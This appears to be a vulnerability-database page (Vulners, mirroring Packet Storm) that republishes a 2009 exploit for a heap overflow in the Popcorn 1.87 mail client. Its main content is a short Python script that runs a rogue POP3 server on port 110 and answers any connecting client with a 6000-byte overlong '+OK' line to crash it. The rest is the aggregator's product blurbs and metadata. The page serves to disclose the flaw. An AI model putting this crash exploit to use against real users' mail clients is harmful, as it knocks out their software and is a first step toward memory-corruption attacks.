Lucene search
K

Popcorn 1.87 Heap Overflow

🗓️ 23 Apr 2009 00:00:00Reported by x.CJP.xType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 16 Views

Popcorn 1.87 Heap Overflow exploit using Python script to send a buffer of 6000 characters to POP3 serve

Code
`#!/usr/bin/python  
#[x]Product download : http://www.ultrafunk.com/products/popcorn/  
#[+]Founder : x.CJP.x  
#[+]Greeting : His0k4,Sub-Zero,Bibi-info,Aach2006,Youness,Simitch,Halimz,Bibicha.. :=)  
#[-]Seni seviyorum, base64_decode('TW91bmE=');  
  
from socket import *  
import struct  
  
buffer="\x41"*6000 # just random  
  
s = socket(AF_INET, SOCK_STREAM)  
s.bind(("0.0.0.0", 110))  
s.listen(1)  
print "[*] Listening on [POP3] 110"  
c, addr = s.accept()  
print "[*] Connection accepted from: %s" % (addr[0])  
  
c.send("+OK "+buffer+"\r\n")  
c.recv(512)  
raw_input("[*] Crashed!\nPress key to quit")  
c.close()  
s.close()  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

23 Apr 2009 00:00Current
0.3Low risk
Vulners AI Score0.3
16